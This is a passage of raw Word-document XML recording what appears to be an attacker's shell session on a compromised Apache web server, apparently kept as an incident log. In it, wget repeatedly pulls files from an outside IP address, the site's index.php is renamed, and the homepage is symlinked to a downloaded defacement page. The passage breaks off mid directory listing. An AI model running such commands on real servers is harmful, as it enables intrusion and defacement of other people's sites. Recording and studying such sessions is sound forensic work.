          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>wget --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F65559" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>wget http://217.195.49.146:63129/fr.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634E8A2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD7C9F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>uid=48(ap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ache) gid=48(apache) groups=48(apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432BD92" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>type wget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399F73C3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wget is hashed (/usr/bin/wget)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528E4FE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7CE5C65A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F761FC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls - l fr*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76BA9E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE21079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fr*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9EB9F6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 apache apache 58 Mar 12 13:39 fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651018F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB5BA11" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B00653" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF8A6C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;img src="FrogSquad.jpg" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E3D35" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9EEA48" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E7F55" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>rm fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7BC0A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Fro*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB5B582" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 apache apache 8192 Mar 12 13:41 FrogSquad.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0108F3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>nc -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1527A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>wget http://217.195.49.146:63129/fr.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44860A6E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654AFE51" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>uid=48(apache) gid=48(apache) groups=48(apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B59E6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>wget -o xx "http://217.195.49.146:63129/fr.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13847252" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B227C3E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>uid=48(apache) gid=48(apache) groups=48(apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505492A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xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4A6A6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 apache apache 126 Mar 12 13:55 xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670A18B3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>file xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09628889" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>xx: ASCII text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241CACC3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C8922" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--2015-03-12 13:55:41</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--  http://217.195.49.146:63129/fr.jpg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10C5C475" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Connecting to 217.195.49.146:63129... failed: Connection refused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E6D96" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>wget -o xx "http://217.195.49.146:63129/fr.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8EC5FE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xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E8B73" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 apache apache 584 Mar 12 13:56 xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A487D04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fr.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0CBD0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-rw-r--r-- 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>apache apache 168962 Mar 12 13:44 fr.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C7975F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506E2D1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--2015-03-12 13:56:30</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--  http://217.195.49.146:63129/fr.jpg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44383475" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Connecting to 217.195.49.146:63129... connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B413FC0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>HTTP request sent, awaiting response... 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51377B05" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Length: 168962 (165K) [image/jpeg]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58775997" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Saving to: 'fr.jp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>g'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4C979" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="33A21C12" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476"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>0K .......... .......... .......... .......... .......... 30% 78.0K 1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1BB4C7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>50K .......... .......... .......... .......... .......... 60</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>%  155</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>K 1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3391E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">   100K .......... .......... .......... .......... .......... 90</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>%  313</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>K 0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE3136F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">   150K .......... .....                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>100% 1.30M=1.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D5382" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4E294EF5" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>2015-03-12 13:56:33 (145 KB/s) - 'fr.jpg' saved [168962/168962]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6F7B4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>rm xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919810A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>rm fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127855DF" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>wget -o xx "http://217.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>195.49.146:63129/fr.html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82FB71" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4F712" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B718ED" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43F617" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;img src="fr.jpg" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44C0D2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A62AC7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4031C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70B83BCF" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB711A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index*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EEADC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwxrwxrwx 1 root apache 3263 Jun </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>20  2010</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4A96E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>mv index.php imsuchaniceguyyoushouldbuymeabeer.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D749A94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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B13C2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ln -s skyblue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>/fr.html index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A11B3D9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skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D526A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49BF8A65" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D0F05" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA613D9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>total 2244</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01544E4B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  35147 Jun 20  2010 COPYING.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C3A49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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>8192 Mar 12 13:41 FrogSquad.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964CE58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6379 Jun 20  2010 admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D0AC8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2788 Mar 11 11:39 base.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A35FD1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29 Jun 20  2010 build.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279FA181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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>6 Jul 24  2010 cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32039DC4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328 Mar 12 13:31 cm0.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8421E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4096 Jul 24  2010 configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509D518A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>drwxrwxrwx 16 root   apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4096 Jul </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>24  2010</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
